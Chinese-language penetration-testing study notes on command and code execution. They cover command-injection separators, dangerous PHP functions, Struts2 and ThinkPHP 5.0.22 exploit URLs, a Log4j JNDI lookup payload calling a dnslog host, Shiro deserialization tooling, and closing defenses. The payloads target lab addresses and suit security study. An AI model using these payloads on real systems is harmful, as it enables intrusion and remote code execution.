命令执行(rce)
1.命令与代码执行原理
- 命令执行原理
参数给变量未经过滤,直接使用了不安全的函数处理了变量
127.0.0.1&&ipconfig 有漏洞
- 常用的函数
assert,system,exec,shell_exec, eval,``(反单引号)
- 代码执行原理
参数给变量未经过滤,直接使用了不安全的函数处理了变量,使用了eval函数
可以执行代码
2.如何挖命令执行漏洞
(1)执行系统命令: assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,``(反单引号)
(2)代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
(3)文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
(4).htaccess: SetHandler, auto_prepend_file, auto_append_file
3.命令执行一般出现那些地方
只要带参数的地方都可能出现命令执行漏洞
常见的路由器、防火墙、入侵检测、自动化运维平台
4.测试方法(绕过方法)
- &&
127.0.0.1&&ipconfig
- &
过滤了&&可以使用&
127.0.0.1&ipconfig
- |
127.0.0.1|ipconfig 后面的被执行
- ||
5.框架介绍
struts2框架
1.怎么识别
扩展名为.action和.do
payload apache.struts2
2.使用的工具
对比工具的区别采用抓包放包的wse抓包
2.struts2命令执行漏洞
s2-005、s2-009、s2-013、s2-016、s2-019、devmode、s2-032、s2-037、s2-045、s2-048、s2-052、s2-057
- s2-045复现
dir /s c:\\*.jsp 查看文件路径/s是递归
- s2-046复现
添加用户
可以开3389远程连接
- s2-048复现
http://10.0.0.139:8090/struts2-showcase/integration/saveGangster.action
- s2-058复现
添加
删掉这里
把type="chain"改成type="redirectAction"
http://10.0.0.139:8090/struts2-showcase/actionChain1.action 这个页面有漏洞
thinkphp5.0.22框架
- 框架的搭建
修改文件,在thinkphp目录搜索database.php文件配置数据库连接
PHP5.4以上版本
- 怎样知道对方的框架是thinkphp以及版本号
http://10.0.0.139:92/thinkphp/public/index.php 拼接错误的
http://10.0.0.139:92/thinkphp/public/index.php
打开图标为一个笑脸就是thinkphp
- 检测框架是否有漏洞
使用bp里面的工具
读取文件
http://10.0.0.139:92/thinkphp//runtime/log/202309/20.log 日志信息泄露
http://10.0.0.139:92/thinkphp/public//s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
http://10.0.0.139:92/thinkphp/public//?s=captcha&test=-1 Post: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
apache log4j
Apache Log4j是一个开放源码的Java日志记录库,主要可以帮助开发人员更轻松地控制日志级别,构建记录器,以及在多种日志目标之间转换,而无需修改日志消息。
- 原理
由于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
- 漏洞影响版本
Apache Log4j 2.x <= 2.14.1
- 攻击代码
${jndi:ldap://${sys:java.version}.iswaen.dnslog.cn} 后面需要换
- 怎么挖漏洞
在输入的地方登录的地方插入payload ${jndi:ldap://${sys:java.version}.iswaen.dnslog.cn}
- 修复方案
1. 升级到java8以上
2.中间件按官网升级 ,升级了会自动移除对lookup功能的支持,默认就会禁用jndi的方法,移除log4j包中的jndilookup类
apache shiro(反序列化)
- 搭建
cat /etc/apt/sources.list
apt-get update
apt-get install docker
apt-get install docker-compose
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
http://10.0.0.131/
webshell工具
- 介绍
Apache Shiro是一个功能强大且易于使用的 Java 安全框架,主要包含身份验证、授权、加密和会话管理等功能,可用于保护任何应用程序。
- 原理
shiro 550
提供了记住我的功能(rememberme),用户登录成功后会生成经过加密并编码的cookie,在服务端接收cookie值后进行base64解码->ASE解码->反序列化。攻击者只要找到ase加密的密钥,就可以构造一个恶意对象,对其进行序列化->ASE加密->base64编码,然后将其作为cookie的rememberme字段发送,shirp将rememberme进行解密并且反序列化,最终造成反序列化漏洞
shirp 721
由于apache siro cookie 中通过ase-128-cbc模式加密的rememberme字段,并重新请求网站,进行反序列化攻击,最终导致任意代码执行
- 受影响版本区别
shiro 550 apache shiro < 1.2.4 ase加密的密钥泄露,造成了这个漏洞
shiro 721 apache shiro < 1.4.2 rememberme字段出现问题
- 怎么判断apache shiro 框架
burp抓包有 rememberme 和 deleteme
- 攻击工具
shiroattack , shiroexp
- 修复方案
升级shiro至最新版本1.7.1
保持shiro版本不变,修改rememberme默认密钥
禁用rememberme 默认密钥
6.防御
1. 配置好php相关参数
通过Php配置文件里面有个disable_functions = 配置,禁止某些php函数,
例如:disable_functions =system,passthru,shell_exec,exec,popen
便禁止了用这些函数来执行系统命令
2.升级中间件
3.参数给变量严格过滤,把参数写死。如果填入ip地址,以点作为切割判断是不是四段